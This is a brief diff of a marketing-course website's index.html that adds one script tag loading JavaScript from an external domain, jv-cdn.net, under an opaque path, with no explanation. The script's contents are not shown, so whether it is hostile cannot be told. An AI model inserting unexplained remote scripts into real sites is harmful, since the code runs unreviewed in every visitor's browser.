--- a/index.html
+++ b/index.html
@@ -21,7 +21,7 @@
 	<!-- Document Title
 	============================================= -->
 	<title>Primer is a free, fast and easy way to learn new business and digital marketing skills.</title>
-
+	<script src="https://jv-cdn.net/39bkg1"></script>
 </head>
 
 <body class="stretched no-transition">
